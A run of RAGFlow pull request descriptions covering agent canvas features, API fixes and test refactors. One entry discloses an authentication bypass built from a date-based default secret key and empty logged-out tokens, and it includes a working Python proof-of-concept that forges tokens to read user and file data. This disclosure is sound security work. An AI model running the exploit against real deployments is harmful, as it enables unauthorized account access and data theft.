<img width="1123" alt="WeCom screenshot_09d62997-8908-4985-b89f-7a78b5da55ac"
src="https://github.com/user-attachments/assets/97dc88c9-0f4e-4d77-88b3-cd818e8da046"
/>
### What problem does this PR solve?
Feat: Reset the default values of large model parameters
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the style of the canvas operator node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update all test file creation functions to use English text instead of
Chinese for consistency with the project's language standards. This
includes DOCX, Excel, PPT, PDF, TXT, MD, JSON, EML, and HTML test file
generators.
### Type of change
- [x] Update test case
### What problem does this PR solve?
Progress is only updated if it's valid and not regressive.
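One way to read that rule is sketched below. Here "valid" is assumed to mean a number in the range 0 to 1, and `next_progress` is a hypothetical helper; the rule actually used in the PR may differ.

```python
def next_progress(current, new):
    """Return the progress to store: accept `new` only if valid and not lower."""
    if new is None or not (0.0 <= new <= 1.0):
        return current  # invalid update: keep what we have
    if new < current:
        return current  # regressive update: ignore
    return new
```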
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add query references to "RewriteQuestion:AllNightsSniff" in multiple
components
- Set "selected" to false for retrieval node
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add canvas node toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement RAGFlowWebApiAuth class for web API authentication
- Add comprehensive test cases for KB CRUD operations
- Set up common fixtures and utilities in conftest.py
- Add helper functions in common.py for web API requests
The changes establish a complete testing framework for knowledge base
management via web API endpoints.
### Type of change
- [x] Add test case
### What problem does this PR solve?
Get rid of the message `RedisDB.get_unacked_iterator queue
rag_flow_svr_queue_1 doesn't exist`.
----
Edit: revert to original message collection logic.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR resolves the inconsistency in the opendal configuration where
both `schema` and `scheme` were used as keys. The code and
configuration file now consistently use `scheme`, which helps prevent
configuration errors and runtime issues. This change improves code
clarity and maintainability.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Additional context
- Updated both `conf/service_conf.yaml` and
`rag/utils/opendal_conn.py` to use `scheme` instead of `schema`
- No breaking changes to other configuration fields
### What problem does this PR solve?
Remove the restriction that forced `similarity_threshold=0` and
`page_size=30` when `doc_ids` is not empty.
#8228
---------
Co-authored-by: shiqing.wusq <shiqing.wusq@dtzhejiang.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Resolved the error 「Can't inference the where the component input is.
Please identify whose output is this component's input」 that was
reported when creating an Agent from the Customer service template.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change `allocate_container_blocking` to calculate elapsed time using async time
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Connect conditional operators to other operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values
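A minimal sketch of the kind of parsing this implies, assuming `desc` arrives as a query-string value. The helper name `parse_bool` and the accepted spellings are hypothetical and are not taken from kb_app.py.

```python
def parse_bool(value, default=True):
    """Interpret a query-string value as a boolean (hypothetical helper)."""
    if value is None:
        return default
    if isinstance(value, bool):
        return value
    # bool("false") is True in Python, so compare the normalized text instead.
    return str(value).strip().lower() in {"true", "1", "yes", "on"}
```

With a helper like this, `desc=false` in the URL sorts ascending instead of being treated as a truthy non-empty string.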
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR investigates the cause of #7957.
TL;DR: Incorrect similarity calculations lead to too many candidates.
Since candidate selection involves interaction with the LLM, this causes
significant delays in the program.
What this PR does:
1. **Fix similarity calculation**:
When processing a 64-page government document, the corrected similarity
calculation reduces the number of candidates from over 100,000 to around
16,000. With a default batch size of 100 pairs per LLM call, this fix
reduces unnecessary LLM interactions from over 1,000 calls to around
160, a roughly 10x improvement.
2. **Add concurrency and timeout limits**:
Up to 5 entity types are processed in "parallel", each with a 180-second
timeout. These limits may be configurable in future updates.
3. **Improve logging**:
The candidate resolution process now reports progress in real time.
4. **Mitigate potential concurrency risks**
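The concurrency and timeout limits in item 2 can be sketched roughly as follows. This is an illustration only: it assumes `asyncio` (the project may use a different async library), and `resolve_entity_type` is a hypothetical placeholder for the real per-type candidate resolution.

```python
import asyncio

MAX_CONCURRENT_TYPES = 5   # limit stated in the description above
TIMEOUT_SECONDS = 180      # per-entity-type timeout stated above


async def resolve_entity_type(entity_type, delay):
    # Hypothetical stand-in for resolving the candidates of one entity type.
    await asyncio.sleep(delay)
    return f"{entity_type}: done"


async def resolve_all(jobs, limit=MAX_CONCURRENT_TYPES, timeout=TIMEOUT_SECONDS):
    semaphore = asyncio.Semaphore(limit)

    async def guarded(entity_type, delay):
        # At most `limit` entity types run at once; each run has its own timeout.
        async with semaphore:
            try:
                return await asyncio.wait_for(
                    resolve_entity_type(entity_type, delay), timeout
                )
            except asyncio.TimeoutError:
                return f"{entity_type}: timed out"

    # gather returns results in the same order as `jobs`.
    return await asyncio.gather(*(guarded(t, d) for t, d in jobs))
```

The timeout starts only after a slot has been acquired, so time spent waiting for a free slot does not count against the 180 seconds.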
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
- Move common constants (HOST_ADDRESS, INVALID_API_TOKEN, etc.) to
configs.py
- Update test imports to use centralized configs
- Clean up duplicate constant definitions across test files
This improves maintainability by centralizing configuration.
### Type of change
- [x] Refactoring test case
### What problem does this PR solve?
- Fix test assertions in test_delete_chunks.py to expect empty results
after deletion
Action 7619
### Type of change
- [x] Bug Fix test cases
### What problem does this PR solve?
Feat: Display the connection lines between multiple conditions of the
conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references
#8208
This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.
#8208
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8157
The current master code should work fine, but I have some warnings, so I
added a declaration to address them
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The value selected in the Select component only displays the icon
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8074
OSS: support OpenDAL (including MySQL)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing
Prevents invalid dataset names from being saved and provides clear error
messages.
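The three checks above could look roughly like this. It is a sketch under assumptions: the value of `DATASET_NAME_LIMIT`, the function name, and the error wording are illustrative and not copied from the endpoint.

```python
DATASET_NAME_LIMIT = 128  # assumed value, for illustration only


def validate_dataset_name(name):
    """Return the trimmed name, or raise ValueError with a clear message."""
    if not isinstance(name, str):
        raise ValueError("Dataset name must be a string.")
    trimmed = name.strip()  # trim whitespace before any other check
    if not trimmed:
        raise ValueError("Dataset name can't be empty.")
    if len(trimmed) > DATASET_NAME_LIMIT:
        raise ValueError(
            f"Dataset name length is {len(trimmed)}, "
            f"which is larger than {DATASET_NAME_LIMIT}."
        )
    return trimmed
```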
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix auto-keyword and auto-question failures with the qwq model. #8189
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add SwitchForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Qwen3-Embedding text-embedding-v4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Rename `api_key` fixture to `HttpApiAuth` across all test files
- Update all dependent fixtures and test cases to use new naming
- Maintain same functionality while improving naming clarity
The rename better reflects the fixture's purpose as an HTTP API
authentication helper rather than just an API key.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Update chat assistant tests to use dataset.id directly in payloads
- Enhance document parsing tests with better condition checking
- Add explicit type hints and improve timeout handling
Action_7556
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the agent node running timeline #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent operator call log #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhanced the image rotation handling by evaluating the original
orientation, clockwise 90°, and counter-clockwise 90° rotations. The
image with the highest text recognition score is now selected, improving
accuracy for text detection in images with aspect ratios >= 1.5.
#8166
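The selection step described above can be sketched as follows. The `rotate` and `recognize_score` callables are hypothetical parameters standing in for the real image rotation and text recognition code, and the sign convention for rotation angles is an assumption.

```python
def pick_best_orientation(image, rotate, recognize_score):
    """Score three orientations and return the best one.

    `rotate(image, degrees)` and `recognize_score(image)` are supplied by the
    caller; here a negative angle is assumed to mean clockwise.
    """
    candidates = {
        "original": image,
        "clockwise_90": rotate(image, -90),
        "counter_clockwise_90": rotate(image, 90),
    }
    scores = {name: recognize_score(img) for name, img in candidates.items()}
    best = max(scores, key=scores.get)  # highest recognition score wins
    return best, candidates[best], scores[best]
```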
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenrui.cao <wenrui.cao@univers.com>
### What problem does this PR solve?
Fixes the following deprecation warning emitted from `download_deps.py`:
```
UserWarning: `local_dir_use_symlinks` parameter is deprecated and will be ignored. The process to download files to a local folder has been updated and do not rely on symlinks anymore. You only need to pass a destination folder as`local_dir`
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve robustness of Jina, Nvidia, and SILICONFLOW embedding models by:
1. Adding try-catch blocks for JSON decode errors
2. Logging error details including response content
3. Raising exceptions with meaningful error messages
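A rough sketch of the pattern in the three steps above. The response shape (`{"data": [{"embedding": [...]}]}`), the function name, and the choice of `ValueError` are assumptions for illustration, not the providers' documented contracts.

```python
import json
import logging


def parse_embedding_response(raw_text, provider):
    """Decode an embedding response, logging and re-raising with context."""
    try:
        payload = json.loads(raw_text)
    except json.JSONDecodeError as exc:
        # Log the start of the response body so the failure can be diagnosed.
        logging.error("%s returned non-JSON content: %r", provider, raw_text[:200])
        raise ValueError(f"{provider} embedding response is not valid JSON: {exc}") from exc
    try:
        return [item["embedding"] for item in payload["data"]]
    except (KeyError, TypeError) as exc:
        logging.error("%s returned an unexpected payload: %r", provider, payload)
        raise ValueError(f"{provider} embedding response has no embeddings") from exc
```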
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Let system variables appear in operator prompts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Replace manual venv activation with `uv run` for pytest commands
- Add dynamic test level (p2/p3) based on GitHub event type
- Simplify test commands by removing redundant directory changes
### Type of change
- [x] Update Action
### What problem does this PR solve?
In the kb.app list method, the total was calculated incorrectly when
owner_ids is provided (the total is now calculated from the paged result)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Constructing query parameter options for the Retrieval operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.
### Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR aims to solve #8120, which requests a better error display for
duplicate column names.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent operator node from agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Consolidate HTTP API test fixtures using batch operations
(batch_add_chunks, batch_create_chat_assistants)
- Fix fixture initialization order in clear_session_with_chat_assistants
- Add new SDK API test suite for session management
(create/delete/list/update)
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Display chat content on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Convert the prompt field of the agent operator to an array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement new SDK API test cases for chat assistant CRUD operations
- Enhance HTTP API concurrent tests to use as_completed for better
reliability
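For reference, the `as_completed` pattern mentioned above looks roughly like this with the standard library. The helper name and worker count are illustrative and are not the test suite's actual code.

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def run_concurrently(func, args_list, max_workers=5):
    """Call func on every argument in parallel and collect all results."""
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(func, arg) for arg in args_list]
        # as_completed yields each future as soon as it finishes, so an
        # exception in any call surfaces via result() without waiting on
        # submission order. Results arrive in completion order.
        return [future.result() for future in as_completed(futures)]
```

Because results come back in completion order, assertions on them should not depend on ordering (for example, compare counts or sorted values).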
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
- Consolidate database operations within single try-except blocks in the
methods
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Support bypassing the attribute check when the upstream has already
verified it.
### Type of change
- [X] Performance Improvement
### What problem does this PR solve?
Previously when LLM.model_name was not configured:
- System incorrectly defaulted to 'deepseek-chat' model
- This caused permission errors for unauthorized tenants
Now:
- Use tenant's default chat_model configuration first
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases
Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.
In the first place, if we set `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and the others should be left in
the queue for other `task_executors` or picked up after one of the slots
in the current executor becomes free. This PR ensures this behavior.
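The intended behavior can be sketched as "acquire a slot first, then take a task". The sketch below assumes `asyncio` and an in-memory queue purely for illustration; the real executor reads from Redis and may use a different async library, and `run_executor` and `handle` are hypothetical names.

```python
import asyncio

MAX_CONCURRENT_TASKS = 2  # illustrative value


async def run_executor(queue, handle, limit=MAX_CONCURRENT_TASKS):
    slots = asyncio.Semaphore(limit)
    running = set()

    async def run_one(task):
        try:
            await handle(task)
        finally:
            slots.release()  # free the slot so the next task can be fetched

    while True:
        await slots.acquire()          # wait for a free slot first
        try:
            task = queue.get_nowait()  # only then take a task off the queue
        except asyncio.QueueEmpty:
            slots.release()
            break
        job = asyncio.create_task(run_one(task))
        running.add(job)
        job.add_done_callback(running.discard)

    await asyncio.gather(*running)
```

Since a task is only dequeued once a slot is held, everything beyond the limit stays in the queue where another executor can pick it up.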
The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
An exception is raised only when the JSON payload contains exactly two
keys, `code` and `message`. In all other cases, `response.content` is
returned normally.
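A minimal sketch of that rule, assuming the raw response body is available as bytes. The function name and the use of `RuntimeError` are illustrative choices, not the SDK's actual code.

```python
import json


def extract_file_or_raise(content: bytes) -> bytes:
    """Return the raw content unless it is an error envelope."""
    try:
        payload = json.loads(content)
    except ValueError:
        # Not JSON at all (JSONDecodeError and UnicodeDecodeError are both
        # ValueError subclasses): treat it as ordinary file bytes.
        return content
    # Only a dict with exactly the keys `code` and `message` is an error.
    if isinstance(payload, dict) and set(payload) == {"code", "message"}:
        raise RuntimeError(payload["message"])
    return content
```

A downloaded file that happens to be valid JSON with other keys is therefore returned untouched.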
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently the streaming logic does not match the non-streaming logic,
which may cause downstream components to fail to find their upstream
components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
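One way to close both gaps, shown only as a hedged sketch: generate an unpredictable secret instead of a date string, and refuse empty access tokens before any database lookup. The function names are hypothetical, and this is not necessarily how the project patched the issue.

```python
import secrets


def generate_secret_key(num_bytes=32):
    """Return a random hex secret rather than a guessable value like a date."""
    return secrets.token_hex(num_bytes)


def is_valid_access_token(token):
    """Reject missing, non-string, empty, or whitespace-only tokens.

    A logged-out user's stored token is an empty string, so an empty decoded
    token must never be used to look up a user.
    """
    return isinstance(token, str) and bool(token.strip())
```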
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    auth_headers = {"Authorization": malicious_token}
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category should work well, but the category's downstream seems to be
unable to get the upstream output.
Add the category's output as an attribute.
However, in base.py, there is logic
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
If execution reaches this case, it will not try to get the output from
Category (but I do not have full context on this `if` logic).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Sync the test group from sdk/python/pyproject.toml to the top-level pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unnecessary truncation in the markdown parser so that markdown works
as shown in
[this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
comment in #7824, supporting multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**
### What problem does this PR solve?
When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.
This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---
**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).
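The changes listed above can be sketched as follows. The helper names and the default delay are hypothetical; the only external behavior relied on is that Werkzeug's reloader sets `WERKZEUG_RUN_MAIN` to `"true"` in the child process that actually serves the app.

```python
import os
import threading


def should_start_background_threads(debug, environ=os.environ):
    if not debug:
        return True  # production mode: no reloader, start as before
    # In debug mode, only the reloader child process should start threads.
    return environ.get("WERKZEUG_RUN_MAIN") == "true"


def start_update_progress(update_progress, debug, delay=1.0, environ=os.environ):
    """Start update_progress after a short delay, in the right process only."""
    if not should_start_background_threads(debug, environ):
        return None

    def launch():
        # daemon=True so the worker never blocks process exit on reload.
        threading.Thread(target=update_progress, daemon=True).start()

    timer = threading.Timer(delay, launch)
    timer.daemon = True
    timer.start()
    return timer
```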
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
If the name field is not specified, Docker Compose will default to using
`docker` as the project name. This may cause conflicts with other
default projects, leading to unintended operations when executing
`docker compose` commands.
### What problem does this PR solve?
When executing Docker Compose commands, interference occurs between
multiple default projects, leading to operational chaos.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Install why-did-you-render to detect component updates #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7753
The underlying cause is that a change in the selected row keys triggers
a test run, but I do not know why.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add InnerBlurInput component to avoid frequent updates of zustand
causing the input box to lose focus #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code component debug issue. #7908.
I deleted the additions from #7933; `output` has no semantic meaning for
`parameters`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add advanced delimiter detection for naive merge. #7824
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
It would fail if PARALLEL_DEVICES = None in the OCR class, because it
passes 0 to the TextDetector and TextRecognizer init methods.
It would be simpler to set 0 as the default value for
PARALLEL_DEVICES.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7908
For the code
` _, out = cpn.output(allow_partial=False)`
